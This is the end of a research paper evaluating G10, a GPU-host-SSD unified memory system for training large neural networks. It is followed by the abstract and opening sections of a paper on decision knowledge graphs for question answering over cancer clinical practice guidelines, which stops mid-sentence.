(PTEs), when garbage collection (GC) of the SSD moves valid flash pages to a new flash block. G10 relies on the existing UVM supports to maintain the consistency of the host-side unified page table and GPU-side local page table, as well as the TLBs. As G10 migrates tensors among GPU memory, host memory, and SSD at page granularity, the corresponding PTEs and TLBs will also be updated with the new page address. Since the PTE and its corresponding TLB are always updated, the unified memory system handles address translations and paging to load data from SSD or host memory to the GPU memory. The UVM extension simplifies the programmability and enables transparent tensor migration. Its page fault handling mechanism may incur extra performance overhead. However, the smart tensor migration mechanism in G10 minimizes unexpected page faults and data migrations, which makes the UVM extension an appealing feature (see Figure 11). ### Tensor Migration with Extended UVM G10 supports smart tensor migration with the extended UVM (SS4.5). It extends the device UVM driver to implement the smart migration handler on the host. We show the workflow of tensor migration in Figure 10. Upon executing g10_pre_evict(vaddr, size, target_loc), CUDA runtime will send an exception to the migration handler on the host side. The migration handler will initiate the migration of the corresponding tensor, and migrate the tensor to the specified location target_loc via the DMA engine. Note that G10 will rely on the unified memory system for the address translation for vaddr, and use the size to decide how many pages it will migrate. Upon executing g10_pre_efetch(vaddr, size), the tensor migration handler will access the unified memory with vaddr. It will initiate the prefetching process and request the GPU DMA engine to fetch the tensor from the host memory or SSD. As shown in Figure 10, for tensor evictions and prefetching, G10 will rely on the unified page table to identify the physical locations of tensors (). For pre-evictions, G10 will look up the GPU page to be evicted. After that, the migration metadata will be stored in corresponding Migration Metadata Queues (). The Migration Arbiter will select several page migrations to form the next migration batch and store them in the Transfer Sets (). During this procedure, The G10 driver will also communicate with GPU to allocate GPU memory on demand. The migrations in the Transfer Sets will be batched periodically, the corresponding SSD-GPU data transfer will be handled by the Direct Storage Access (DSA) process, and CPU-GPU data transfer will be handled by the DMA process (). After the data migrations, the unified page table and corresponding TLB entries will be updated (). G10 fully utilizes the GPU-Host bandwidth and storage bandwidth with data batching. Migration Arbiter applies different priorities to different migration queues (e.g., page faults have the highest priority). G10 will calculate the batch number in the next round to fully saturate the bandwidth. ## 5. Implementation Details **Tensor vitality analyzer.** The tensor vitality analyzer is a static analysis tool, which is compatible with the deep learning compiler PyTorch. The analyzer takes a DNN model and the profiled execution time of each kernel as inputs. After the static analysis (SS4.2), it generates instrumented CUDA programs. We take the instrumented program into the simulator framework (see below) to simulate the entire G10 system. **Simulator framework.** To efficiently simulate the executions of diverse DNN models, we first run these real models on a real A100 GPU and trace the execution of all kernels. We build a simulation framework based on UVMSmart(Wang et al., 2017) and GPGPU-Sim(Wang et al., 2018) to simulate the UVM, including the GPU page fault handling, data migration, and address translation. Our simulator supports taking the execution traces as input, so it can replay the kernel traces. we believe our simulation framework reasonably models the actual execution of DNN models, especially considering it replays real kernel traces collected on a real GPU. We focus on the address translation and coherency support for the unified page tables. We modeled the latency overheads caused by the host page fault handler, the interaction between the GPU and CPU for the page fault handler, and page table walks, inside our timing model for accurate measurements. When incorporating SSD into the UVM system, we follow the approach described in prior studies (Beng et al., 2018). We rely on the host page fault handling mechanism to do the address translation. Upon access to pages that do not reside in GPU memory, the GPU page fault handler will raise an interrupt to the host, and the host is responsible for moving data. To simulate the SSD internals and capture their activities, such as garbage collection (GC) and flash chip accesses, in our evaluation, we developed an SSD simulator based on SSDSim(Chen et al., 2018) and integrated it into our simulator framework. Therefore, as we measure the overall system performance during the experiments, the internal SSD activities are considered. Figure 10. The workflow of runtime migrations in G10. ## 6. Discussion and Future Work **Multi-GPU support**. G10 can be simply extended to effectively support multiple GPUs for three reasons. First, as multiple GPUs share SSDs, and each GPU can run independently, we can deploy the smart tensor migration mechanism of G10 on each GPU. Therefore, each GPU will make its own decisions on the tensor migrations. Second, current UVM has supported multiple GPUs, which has created a unified memory space across the host memory and all GPUs' memory. The UVM extension of G10 supports multiple GPUs by integrating the shared flash memory space into the existing UVM as discussed in SS4.5. Third, as we increase the number of GPUs, we may want to increase the number of SSDs for increasing aggregated storage bandwidth. Since the SSD array (e.g., using RAID) is shared by multiple GPUs, G10 will treat the SSD array as a shared flash memory space and integrate it into the UVM. Our evaluation (SS7.5) will conduct the sensitivity analysis as we increase the number of SSDs. We wish to explore the multi-GPU support as future work. ## 7. Evaluation We show that (1) G10 outperforms state-of-the-art designs by up to 1.75\(\times\) for training large DNN models that exceed GPU on-board memory capacity (SS7.2); (2) G10 supports larger batch sizes with better performance than other designs (SS7.3); (3) G10 saves host memory capacity with negligible performance degradation (SS7.4); (4) G10 improves DNN training performance with different hardware settings (SS7.5); (5) G10's scheduling algorithm is resilient against profiling errors (SS7.6); (6) G10 has negligible negative impact on the SSD lifetime (SS7.7). ### Experimental Setup We evaluate G10 with diverse DNN models in Table 1, including transformer-based models (BERT and ViT) and CNNs (ResNet, Inceptionv3, and SENet). The models are retrieved from PyTorch examples (Zhu et al., 2017) and the Hugging Face public repositories (Zhu et al., 2017), and the training datasets include CoLA (Zhu et al., 2017) and ImageNet (Wang et al., 2018). We use FP32 format for the tensor representation. We vary the batch size for each model to study the impact of different memory demands. **System configuration.** Table 2 shows the hardware configuration of our experimental testbed. We set the SSD parameters based on Samsung Z-NAND SSD (Wang et al., 2018). The host memory, GPU, and SSD are connected with a PCIe interconnect that can deliver a bandwidth of 15.754 GB/s bidirectionally. We model the UVM system following prior works (Zhu et al., 2017; Wang et al., 2018). We compare G10 with several state-of-the-art GPU memory-expanding solutions: DeepUM+(Wang et al., 2018) and FlashNeuron(Liu et al., 2019). We also evaluate G10 with different host memory capacities. As hardware capabilities evolve over time, we conduct sensitivity analysis with different SSD bandwidths. To summarize, we compare G10 against the following baseline designs: * **Ideal**: a GPU with infinite on-board memory, which gives the theoretically best performance. * **Base UVM**: the basic GPU-CPU-SSD UVM system with only on-demand page migrations via page faults. * **DeepUM+: a UVM system using a correlation-based prefetcher to prefetch data to the GPU memory. We extend the original GPU-CPU-based DeepUM design (Wang et al., 2018) to support SSDs. Upon a GPU page eviction, if the CPU memory is full, DeepUM+ can still evict the page to the SSD. * **FlashNeuron(Liu et al., 2019)**: a DNN training library using direct GPU-SSD communication to selectively swap intermediate tensors (instead of all tensors) to the SSD. Since FlashNeuron worked in a traditional non-UVM style, we used FlashNeuron's memory manager for fair comparison. \begin{table} \begin{tabular}{|l|l|l|l|} \hline **Model** & **\# Kernels** & **Source** & **Dataset** \\ \hline BERT (He et al., 2017) & 1368 & Hugging Face & CoLA \\ \hline ViT (He et al., 2017) & 1435 & Hugging Face & ImageNetNet \\ \hline Inceptionv3 (Wang et al., 2018) & 740 & Pytorch Examples & ImageNet \\ \hline ResNet152 (Wang et al., 2018) & 1298 & Pytorch Examples & ImageNet \\ \hline SENet154 (Wang et al., 2018) & 2318 & Pytorch Examples & ImageNet \\ \hline \end{tabular} \end{table} Table 1. Evaluated DNN models and datasets. Figure 11. DNN training throughput normalized to the ideal performance. **b** is batch size. **M** is the total memory consumption of the DNN w.r.t. GPU memory capacity. \begin{table} \begin{tabular}{|l|l|} \hline **CPU Main Memory** & 128GB DDR4 \\ \hline **GPU** & NVIDIA A100 \\ \hline **GPU Memory** & 40GB HBM2e \\ \hline **Page Size** & **4KB** \\ \hline **SSD Read/Write Bandwidth** & 3.2/3.0 GB/s \\ \hline **SSD Read/Write Latency** & 20/16 \(\mu\)s \\ \hline **SSD Capacity** & 3.2 TB \\ \hline **Interconnect** & PCIe Gen3 x16 \\ \hline **GPU Page Fault Handling Latency** & 45 \(\mu\)s \\ \hline \end{tabular} \end{table} Table 2. System Configuration. Figure 12. Execution time breakdown of training (left to right: Base UVM, FlashNeuron, DeepUM+, G10). ### End-to-end Performance We show the end-to-end DNN training throughput of different benchmarks in Figure 1111 On average, G10 outperforms FlashNeu-ron by 1.56\(\times\) and DeepUM+ by 1.31\(\times\). Compared to the ideal system with infinite GPU memory, G10 unleashes 90.3% of the ideal performance using limited GPU memory. Footnote 11: FlashNeuron fails to execute VIT and Inceptionv3 models when their batch size is large, as the GPU memory cannot host all the tensors required for a kernel execution, due to the limited GPU memory capacity. **DNN training throughput.** As shown in Figure 11, Base UVM performs 4.55\(\times\) worse than the ideal, due to the significant page fault overhead. With heuristic-based tensor eviction and prefetching, FlashNeu and DeepVM+ improve the performance over Base UVM by 2.46\(\times\) and 3.12\(\times\), respectively. However, both of them are still much slower than the ideal performance. Although DeepUM+ supports DNN models with large memory demands, its correlation-based prefetching mechanism cannot capture rich DNN semantics. G10 outperforms FlashNeuron and DeepVM+ by up to 1.75\(\times\), which demonstrates the effectiveness of the smart tensor migration algorithm in capturing DNN semantics. For most benchmarks, G10 achieves nearly ideal performance by exploiting the deterministic dataflow of DNN workloads and best utilizing the limited I/O bandwidth. The only exception is ViT, which has high migration I/O bandwidth demand when the batch size is large. To further understand the benefits of G10, we gradually enable the features of G10. Therefore, we have (1) **G10-GDS** that only supports tensor migrations between GPU and SSD; (2) **G10-Host** that enables tensor migrations among GPU, host, and SSD; and (3) **G10** that extends **G10-Host** by having the UVM extension which unifies the GPU memory, host memory, and SSD (SS4.5). As shown in Figure 11, G10-GDS outperforms existing solutions for most DNN workloads, because of its smart tensor migrations. G10-Host further improves the performance as it utilizes the host memory. For ResNet152 workload, G10-GDS does not perform better than DeepUM+, because G10-GDS can only migrate tensors between GPU and SSD. However, by enabling tensor migrations between GPU and host, G10-Host outperforms DeepUM+ by 1.23\(\times\). With UVM extension enabled, G10 further improves the performance, due to the reduced software overhead of accessing flash pages and handling page faults. **Execution time breakdown.** The performance benefit of G10 comes from the better overlapping between computation and memory swapping. Figure 12 shows the percentage of time during which tensor migrations perfectly overlap with GPU computation, and the percentage of time when tensor migrations stall GPU computation. Compared to all other designs, G10 has the least stall time, since it generates a better swapping schedule than other designs. Figure 13 further shows how many kernels are stalled by tensor swapping. For Base UVM, more than half of the kernels (truncated in the figure) suffer page fault overhead. FlashNeuron and DeepUM+ reduce the number of affected kernels, but both designs still cause significant slowdown to many kernels (4%-30% of kernels). With G10, only 1%-6% of kernels perform worse than the ideal case. **Tensor migration traffic.** To understand how G10 utilizes the available I/O bandwidth, we show the total migration traffic of GPU-SSD and GPU-Host in Figure 14. Due to the inefficiency of heuristic-based migration policies (e.g., LRU policy and linear selection[(12)]). Base UVMand DeepUM+schedule more tensor evictions than necessary. On the contrary, FlashNeuordoes not schedule a sufficient number of evictions as it does not swap weight tensors, so it cannot reserve enough space for future tensors in a timely manner. We also observe that a small amount of host memory plays a critical role for G10 to tolerate tensors that have high migration bandwidth demands. Particularly, transformer models (BERT and ViT) are more bandwidth-intensive, so G10 directs most of their migration traffic to the host memory. CNN models are more compute-intensive, thus, the SSD bandwidth can sustain more than half of the migration traffic. By fully utilizing the available bandwidth, G10 unleashes the potential of the GPU-CPU-SSD unified memory. ### Performance with Varying Batch Size As batch size varies, the performance of G10 is always the closest to ideal among all the designs. In Figure 15, while most designs achieve the ideal performance when the batch sizes are small and the memory demand is low, G10 can tolerate larger batch sizes and higher memory demands. With larger batch sizes, more tensors must be swapped with the limited I/O bandwidth. Thus, it is more crucial to make smart migration decisions to hide the migration Figure 14. Tensor migration traffic breakdown. Figure 13. Distribution of kernel execution time slowdown normalized to ideal performance (lower is better). latency and avoid stalling future kernels. Despite significantly outperforming Base UVM, DeepUM+, and FlashNeuron quickly fall behind the ideal performance as batch size increases, due to the sub-optimal swapping policies. G10 still timely delivers required data to the active kernels under strict capacity and bandwidth limitations in most cases, thanks to its intelligent tensor migrations. In general, G10 outperforms FlashNeuron and DeepUM+ by up to 2.67\(\times\) and 1.45\(\times\), respectively. As batch size continues to increase, the performance of all designs eventually degrades, but G10 still outperforms all other designs. If the total memory consumption of the current and the next kernel exceeds GPU memory capacity, data required by the next kernel cannot be ready in GPU before the kernel starts. Thus, the next kernel inevitably stalls due to poor overlapping between computation and data transfer. ### Impact of Varying Host Memory Capacity While using the cost-efficient SSD to expand GPU memory capacity, G10 also leverages the host memory bandwidth to compensate for tensors that cannot be swapped into and back from the SSD within their inactive periods. Since most tensors do not require high migration bandwidth (Figure 4), G10 only needs a small amount of host memory to tolerate them. Figure 16 shows G10's performance with different host memory capacities. For most DNN models with small batch sizes, 32GB of host memory is sufficient for G10 to fully utilize the migration bandwidth between the host and GPU. The host memory capacity demand grows linearly with the batch size, as the sizes of the migrated tensors grow linearly. As we vary the host memory capacity, we also compare G10 with DeepUM+ and FlashNeuron. We use two representative models: ViT (transformer) with the batch size of 1024 and Inceptionv3 (CNN) with the batch size of 1280. We show the results in Figure 17. When there is no host memory, G10 outperforms DeepUM+ and FlashNeuron by 2.58\(\times\) and 1.04\(\times\) on average, respectively. This is because DeepUM+ relies on conventional GPU UVM and incurs a significant number of page faults. As we increase the host memory capacity, the performance of DeepUM+ is improved, however, it still performs 1.26\(\times\) worse than G10. As FlashNeuron fully relies on GPUDirect Storage and does not use host memory, its performance is barely affected as we vary the host memory capacity. Because of smart data migrations, G10 always performs better than FlashNeuron (1.33\(\times\) on average). ### Impact of Varying SSD Bandwidth We now examine G10 with different SSD bandwidths (e.g., stacking multiple SSDs or using a higher-end SSD). For increased bandwidths, we assume the interconnect is PCIe 4.0 x16 (32 GB/s). In Figure 18, G10 outperforms all other designs regardless of the SSD bandwidth. For all benchmarks, 1 to 4 SSDs (up to 12.8 GB/s) are sufficient for G10 to achieve 90% to 100% of the ideal performance. BERT and ViT fail to attain the ideal performance because they are bottlenecked by the interconnect bandwidth (i.e., always swapping to host still cannot satisfy the bandwidth requirement). G10 exploits the high migration bandwidth of the host memory while best utilizing the SSD to reduce host memory pressure (SS7.4). In contrast, even with Figure 16. Execution time as we vary the host memory capacity. Figure 17. Performance comparison of G10, DeepUM+, and FlashNeuron with different host memory capacity. Figure 15. Training throughput with varying batch sizes. enough SSDs to saturate the interconnect bandwidth, FlashNeuro-mand DeepUM+still only achieve 70%-80% of ideal performance for BERT and ViT. ### Impact of Profiling Errors To understand the robustness of G10's scheduling algorithm against profiling errors, we add random noises to the execution time of each kernel in our simulator. Figure 19 shows the performance of G10 with various degrees of profiling errors. For all benchmarks, the performance degradation is under 0.5% even when the profiling error is \(\pm\)20%. The profiling errors only affect the estimation of tensor inactive period lengths. G10 tolerates such errors by eagerly prefetching a tensor before it is used (SS4.4). In most cases, the early prefetch can tolerate the profiling inaccuracy. ### Impact on SSD Lifetime As reported in the released datasheet of Samsung Z-SSD SZ985(Samsung, 2018), its device endurance is 30 Drive Writes Per Day (DWPD) for five years. According to our study, DNN workloads incur almost 50% writes and 50% reads. In this case, the SSD lifetime of G10 would be 30 DWPD * 1825 days (5 years) * 3.2TB / 3 GB/s * 2 = 3.7 years, when it is used continuously. Considering DNN workloads are data intensive and a commodity SSD usually lasts 3-5 years, the impact on SSD lifetime is not much of a concern. Based on Figure 14, we further break down the traffic into reads and writes. G10 incurs 1.37\(\times\) and 2.20\(\times\) less writes than DeepUM+ and FlashNeuro, respectively. As SSD lifetime is affected by the write traffic, G10 can achieve improved lifetime than state-of-the-art solutions. ## 8. Related Work **GPU memory wall**. DNN workloads are heavily using GPUs. They rely on GPU memory and host memory to host their working sets. However, due to the limited capacity, they cannot host large models (Beng et al., 2016; Wang et al., 2017; Wang et al., 2018; Wang et al., 2019; Wang et al., 2020). An alternative approach is to bring Flash closer to GPUs, such as GPUDirect Storage (Wang et al., 2018), ZnG (Wang et al., 2018; Wang et al., 2020), and AMD's SSG (Wang et al., 2019; Wang et al., 2020). ZnG replaced GPU memory with flash chips and hard coded the flash addresses in the GPU MMU (Wang et al., 2020). SSG and GPUDirect Storage enable GPU to directly communicate with SSDs via the PCIe interface (Wang et al., 2018). Unfortunately, their performance is bottlenecked by the PCIe bandwidth. In this paper, we develop a unified GPU memory system, and best utilize tensor behaviors to overcome the bottlenecks of slow memories. **New memory technologies.** To overcome the memory scaling wall, researchers have been mostly focused on developing scalable memory technologies (Wang et al., 2018; Wang et al., 2019; Wang et al., 2020). For instance, HBM (Chen et al., 2018; Wang et al., 2020) was produced to meet the bandwidth requirement of accelerators, but their capacity is still limited. Intel released its Optane persistent memory (Han et al., 2018), and Samsung released its ultra-low latency SSDs (Wang et al., 2019). G10 is compatible with the new and emerging memory and storage devices, it leverages low-cost memories to scale the GPU memory while reaching near-to-ideal performance. **Unified memory and storage**. Prior studies showed that SSDs can be used as memory via memory-mapped interface (Chen et al., 2018; Wang et al., 2018; Wang et al., 2019; Wang et al., 2020; Wang et al., 2020; Wang et al., 2020; Wang et al., 2020). However, they were designed for CPU-centric computing and cannot be directly applied to GPUs. NVIDIA and AMD have been supporting UVM in their GPU products by enabling unified memory between the host and GPU (Wang et al., 2019; Wang et al., 2020). G10 advances the architecture and integrates flash memories into the unified memory space. To optimize data movements between the host and GPU memory, prior studies (Wang et al., 2018; Wang et al., 2019; Wang et al., 2020; Wang et al., 2020; Wang et al., 2020) explored data localities of DNN workloads. G10 shares the same purpose with them. However, different from the studies like ZeRO series(Wang et al., 2018; Wang et al., 2020; Wang et al., 2020) that offload tensors at a coarse (DNN layer) granularity, G10 enables tensor migrations at page granularity, and develops an active-time-aware tensor migration scheme. ## 9. Conclusion We present G10, a unified GPU memory and storage architecture for scaling deep learning workloads. G10 is driven by our observation that the predictable tensor behaviors offer sufficient opportunities for G10 to make smart data migrations. Thus, we can overlap the GPU computation and flash accesses. With diverse DNN training workloads, we show that G10 can achieve near-ideal performance. ###### Acknowledgements. We thank the anonymous reviewers for their insightful comments and feedback. This work was partially supported by NSF grant CCF-2107470, NSF CAREER Award CNS-2144796, and a grant from the Defense Advanced Research Projects Agency (DARPA) under the award number HR00112390029. The views, opinions and/or findings expressed are those of the author and should not be interpreted as representing the official views or policies of the Department of Defense or the U.S. Government. Figure 19. Performance of G10 under various degrees of kernel timing prediction errors (normalized to no error). Figure 18. Performance with varying SSD bandwidth (normalized to ideal).
2308.02984
Decision Knowledge Graphs: Construction of and Usage in Question Answering for Clinical Practice Guidelines
In the medical domain, several disease treatment procedures have been documented properly as a set of instructions known as Clinical Practice Guidelines (CPGs). CPGs have been developed over the years on the basis of past treatments, and are updated frequently. A doctor treating a particular patient can use these CPGs to know how past patients with similar conditions were treated successfully and can find the recommended treatment procedure. In this paper, we present a Decision Knowledge Graph (DKG) representation to store CPGs and to perform question-answering on CPGs. CPGs are very complex and no existing representation is suitable to perform question-answering and searching tasks on CPGs. As a result, doctors and practitioners have to manually wade through the guidelines, which is inefficient. Representation of CPGs is challenging mainly due to frequent updates on CPGs and decision-based structure. Our proposed DKG has a decision dimension added to a Knowledge Graph (KG) structure, purported to take care of decision based behavior of CPGs. Using this DKG has shown 40\% increase in accuracy compared to fine-tuned BioBert model in performing question-answering on CPGs. To the best of our knowledge, ours is the first attempt at creating DKGs and using them for representing CPGs.
Vasudhan Varma Kandula, Pushpak Bhattacharyya
2023-08-06T01:38:40Z
http://arxiv.org/abs/2308.02984v1
Decision Knowledge Graphs: Construction of and Usage in Question Answering for Clinical Practice Guidelines ###### Abstract In the medical domain, several disease treatment procedures have been documented properly as a set of instructions known as Clinical Practice Guidelines (CPGs). CPGs have been developed over the years on the basis of past treatments, and are updated frequently. A doctor treating a particular patient can use these CPGs to know how past patients with similar conditions were treated successfully and can find the recommended treatment procedure. In this paper, we present a Decision Knowledge Graph (DKG) representation to store CPGs and to perform question-answering on CPGs. CPGs are very complex and no existing representation is suitable to perform question-answering and searching tasks on CPGs. As a result, doctors and practitioners have to manually wade through the guidelines, which is inefficient. Representation of CPGs is challenging mainly due to frequent updates on CPGs and decision-based structure. Our proposed DKG has a decision dimension added to a Knowledge Graph (KG) structure, purported to take care of decision based behavior of CPGs. Using this DKG has shown 40% increase in accuracy compared to fine-tuned BioBert model in performing question-answering on CPGs. To the best of our knowledge, ours is the first attempt at creating DKGs and using them for representing CPGs. ## 1 Introduction Clinical Practice Guidelines (CPGs) are a set of systematically developed statements intended to assist a doctor or a practitioner to make decisions about appropriate health care to be given to a patient under a specific clinical circumstance. CPGs are built based on evidence from past treatments including the patient's symptoms, conditions over time, and what decisions led to successful treatment. CPGs can change the process of treatment, and outcome of care, improve the quality of care and enable efficient use of resources. Since CPGs are large documents, a lot of time will be taken to manually search CPGs. There is no existing suitable representation for CPGs to perform tasks like searching, navigating, and question-answering. As a result, doctors and practitioners have to manually refer to the guidelines. Our **motivation** is as follows: According to American Hospital Association (aha), in 2022, there were more than 33 million admissions of patients in hospitals in the US, which is an average of 91,000 admissions per day. As the number of patients is increasing, there is heavy workload on doctors, and they may have limited time to review and implement complex guidelines. Also, doctors may be unfamiliar with CPGs due to lack of training, and frequent changes in guidelines over time. Lack of familiarity with CPGs can be a barrier to their use in clinical practice, as doctors may not be aware of the most up-to-date recommendations or may not know how to apply the guidelines to their patients. Therefore, to promote the usage of CPGs, the above barriers need to be overcome. One way to achieve this is by digitizing the guidelines and providing assistance when referring the guidelines using technology. The existing Knowledge Graph representation on which searching and question-answering can be performed is not suitable for storing CPGs as CPGs contain a decision-based structure along with factual data and these decisions in CPGs are updated frequently. Given the following guideline: _"Patient can be treated with chemotherapy if age less than 65"_ The existing KG extraction model gave: Subject: _Patient_; Predicate: _can be treated with_; _Object: chemotherapy_. Therefore, the extracted triple is (_patient, can be treated with, chemotherapy_). The model ignored the condition of age less than 65, which is important for guiding the doctor. Therefore, a good CPG knowledge graph should rep resent not only concepts but also decisions (attributes). If the above guideline is updated to: _"Patient can be treated with chemotherapy if age less than 65 and greater than 35. He should not have any substantial comorbidities."_ The existing KG model will require many changes in its structure (i.e, number of nodes and relations). A good CPG knowledge graph representation should have an efficient updating capability with few changes. Now-a-days with pretrained models which are performing well in question answering tasks the limitation is that there is no sufficient data for training the model. And even if we create huge data and train the model since the treatment guidelines are changed frequently the dataset should also be updated with the guidelines which is another limitation. Considering this storing the CPGs seems better approach compared to pretraining the models. Our contributions are: 1. Creation and releasing of a knowledge graph (KG) with an additional decision dimension added to some nodes in existing KG structure for storing clinical practice guidelines, _i.e., Decision Knowledge Graph (DKG)_. 2. Creation of dataset of triples containing 8300 questions from acute lymphoblastic leukemia, kidney, and bone cancer. Each _triple_ consists of _question_, _answer_, and _cypher query_ (used to query decision knowledge graph). 3. Question-answering model on Clinical Practice Guidelines with the help of Decision Knowledge Graphs. The proposed model gives 40% better results compared to fine-tuned transformer question-answering model. To the best of our knowledge, ours is the first attempt at (i) creating a knowledge graph for CPGs and (ii) adding a decision dimension to a node in KG. The rest of the paper is organized as follows. Section 2 presents a brief survey of the literature. Section 4 introduces CPGs along with NCCN Guidelines. In section 5 provides details about question-answering dataset creation. Section 6 explains the DKG structure along with the construction and usage of DKG. Section 7 provides an application of DKG i.e., question-answering on CPGs. Section 8 provides the results and analysis. Section 9 summarizes and concludes the paper. ## 2 Related work CPGs are written based on evidence, aiming to improve the quality and efficiency of medical treatment and care. They are useful to a doctor in providing proper insights when he/she is treating a patient. Many physicians don't use CPGs. Cabana et al. (1999) claims that the main reasons for not using CPGs are their complexity, unfamiliarity, and distrust. Trust can be improved once CPGs start gaining positive attention and lead to successful treatment of patients. Complexity and familiarity need to be addressed for the usage of CPGs. CPGs were introduced in the early 90s yet their familiarity is still a problem in the medical domain. Given the structured nature, and factual data present in the CPGs, it is reasonable to organize this information as a Knowledge Graph. Rossetto et al. (2020) describes Knowledge Graph (KG) as static graph triples. If the data is static, KG, once constructed, needs no modifications and can be used to perform question-answering and searching tasks. Once the KG is constructed, modifying the KG is costly and takes time as modification involves updating, changing, or deleting multiple nodes and relations which can propagate. Therefore, at times, KG needs to be reconstructed because of some modifications. Construction of a KG involves many steps like co-reference resolution, information extraction, etc. Rossetarez et al. (2020) provides a detailed pipeline of KG construction for biomedical scientific literature. Many existing approaches to constructing KG ignore the conditional statements that are present in the sentences. Jiang et al. (2019) explains how existing ScienceIE models capture factual data and will not consider conditional statements. i.e., An existing system would return the tuple (alkaline pH, increases, activity of TRPV5/V6 channels in Jurkat T cells) if the statement "alkaline pH increases the activity of TRPV5/V6 channels in Jurkat T cells" was given. However, in this case the condition tuple (TRPV5/V6 channels, in, Jurkat T cells) was not identified. Jiang et al. (2020) emphasizes the importance of conditional statements in biomedical data. They also propose a KG representation with conditional statements. The conditional statements are added to the existing KG structure but this structure is not suitable for clinical practice guidelines because updating is not efficient in the current KG structure. From the survey conducted by Liang et al. (2022), many KG question-answering models were relying on rules, keywords, neural networks, etc. After the introduction of SPARQL by Hu et al. (2021), which is a query language to search and modify a KG, retrieving data from KG became easy. Therefore, many question-answering models were proposed using KG. The existing representations of CPGs are complex and unfamiliar as mentioned in Cabana et al. (1999). Manually searching data in CPGs takes time. During emergencies, time is valuable and lack of time can cost lives. A representation for CPGs on which question-answering and searching can be performed will help a lot in emergencies. This representation can also motivate practitioners and doctors to use guidelines. So far, no attempt has been made for representing CPGs to perform question-answering and searching tasks. ## 3 Background In this section, we briefly describe decision knowledge graph and question-answering system. ### Decision Knowledge Graph Decision knowledge graph is a knowledge graph structure with decision dimension added to its structure. We store data related to patients' parameters and conditions of patient in decision dimension. This data is called as _Patient's Constraints_ which are often referred to as _Constraints_ in rest of the paper. Some of the examples of patients' constraints are _Age, tumor size, disease stage, past medical history, etc._ We divide data into static and dynamic data. Static data refers to the data in Clinical Practice Guidelines (CPGs) which changes less frequently or doesn't change at all. _Example: Treatment procedure like chemotherapy etc._ Dynamic data refers to the data in the CPGs which changes frequently. Here, dynamic data doesn't refer to data from a query like the name of the patient, etc. It refers to the data that should be present in the KG to make a decision. _Example: Patient constraints_. ### Question-Answering System A question-answering system is a model which is trained to generate correct answer to given question. There are many ways to approach question-answering. One of the ways is language model trained on input-output pairs such that input is a question and output is the answer. ## 4 Clinical Practice Guidelines for Cancer Clinical Practice Guidelines (CPGs) from National Comprehensive Cancer Network (NCCN) are used for building Decision Knowledge Graph (DKG). These are also referred to as Cancer Guidelines, NCCN Guidelines, or Oncology Guidelines. NCCN is a non-profit alliance dedicated to facilitating effective, quality, and accessible cancer care. The organization is home to around 60 types of cancer research and guidelines including breast cancer, lung cancer, kidney cancer, etc. For the past 25 years, these guidelines are updated regularly based on discussions among world-renowned experts from NCCN member institutions. A snapshot of the NCCN Guidelines, taken from page 12 of Acute Lymphoblastic Leukemia (ALL) Cancer Version 1.2022, is shown in Figure 1. The NCCN guidelines include: 1. List of members and institutions that participated in the specified discussions. 2. Flowcharts for better understanding of decision making. 3. Discussions to provide support for flowcharts. Figure 1: Fragment of Clinical Practice Guidelines by National Comprehensive Cancer Network from page 12 of Acute Lymphoblastic Leukemia (ALL) cancer Version 1.2022 which shows how a ph+ (Philadelphia chromosome) ALL patient should be treated in the induction phase of ALL cancer. Refer to Appendix E for detailed explanation of above fragment 4. Evidence for recommendations and disclosure of potential conflicts of interest by panel members (members who attended the discussion). The flowchart section of guidelines consists of text boxes and arrows connecting these boxes as shown in Figure 1. Some of the words in the text have superscripts and subscripts. Superscripts and subscripts contain a detailed description in the footnote of the paper. There are hyper-texts in some text that refer to other pages in the same document. For more details on CPGs used for this paper refer to Appendix D. ## 5 Dataset Creation The main objective of a Decision Knowledge Graph (DKG) is to perform question-answering thus reducing the manual effort of a doctor to search through the guidelines. There are no available question-answering datasets on Clinical Practice Guidelines. We have created a CPG-QA dataset with 8300 question-answer pairs. This dataset consists of three main types of questions. Types of questions: 1. **What is next treatment advice given a patient's constraints (refer to Section 3.1 for more details on constraints).** _Example: A patient is ALL positive. After his initial diagnosis he is classified as ph- patient. His age is 65. He is not treated with other cancer treatments. What treatment is recommended in this condition?_ 2. **What are the patient's medical constraints that needs to be satisfied given a treatment stage.** _Ex: A patient is ALL positive. After his initial diagnosis he is classified as ph+ patient. What are patient constraints for doing chemotherapy?_ 3. **Given a patient's medical constraints and treatment stage, whether a particular treatment is advisable or not?** _Ex: A patient is ALL positive. After his initial diagnosis he is classified as ph- patient. His age is 65. He is not diagnosed with any other cancer treatment. Can we perform TKI + Chemotherapy on him?_ The dataset also consists of cypher queries for question-answering pairs which are used to query the DKG. These cypher queries are manually constructed given a question. We have verified the correctness of the queries by running them on DKG and matching the outputs of DKG with the expected answer. The format of the dataset is: Examples can be referred from Appendix B. ## 6 Decision Knowledge Graphs This section presents the decision knowledge graph (DKG), its construction, and details on how operations like updating, deleting, and insertion, can be performed on DKGs. ### Introduction In the Knowledge Graph (KG), data is stored as triples consisting of a head entity, a relation, and a tail entity i.e., (head, relation, tail). If there is some change in the KG (i.e., updating triple, deleting triple, or adding new triple), these changes, in the worst case, can propagate to all nodes. Consider the example _given triple (Barack Obama, president of, US) if we want to update Obama to Trump then the update should be done in multiple nodes which talk about US presidency or about the individuals_. Therefore sometimes, updating a KG will become equivalent to rebuilding the KG. The update operation, therefore, is time-consuming. Clinical Practice Guidelines (CPGs) are updated frequently. Hence, KG structure won't be of much help for CPGs as it would require the costly update operation frequently. From the previous few versions of guidelines, we have observed that not all content in the guidelines is changed. The modifications that are made to guidelines, based on discussions, are mainly done on patients' constraints (refer to Section 3.1 for definition). The treatment steps of chemotherapy are not changed but when to perform chemotherapy based on the patient's condition is changed. Therefore, using this observation, we divide the data into static and dynamic data. Static data is the data in CPGs that changes less frequently or doesn't change at all. Dynamic data is the data in CPGs which changes frequently. Here, dynamic data doesn't refer to data from a query like the name of the patient, etc. It refers to the data that should be present in the KG to make a decision. _For example, treatment procedure like chemotherapy is static data and patients' constraints like age>60, MRD rising, etc., is dynamic data._ DKG is a knowledge graph over which we have introduced a decision layer. This decision dimension will consist of dynamic data. Static data is stored as KG triples extracted as proposed by Rossanez et al. (2020). For example, if there is a node, "chemotherapy", we have relations like "procedure", "drugs used", "duration" etc., which comes under static data. When updating a KG, only dynamic data needs to be changed without changing the structure of the KG and static data. Therefore, performing updates on DKG will be a more cost-effective task than updating a KG. Here the static data is stored as a KG. For example, if there is a node, "chemotherapy", we have relations like "duration", "drugs used" etc. Therefore, factual data is stored as we do in a KG, but conditional data is stored in decision nodes. ### Construction of Decision Knowledge Graph DKG is constructed by three 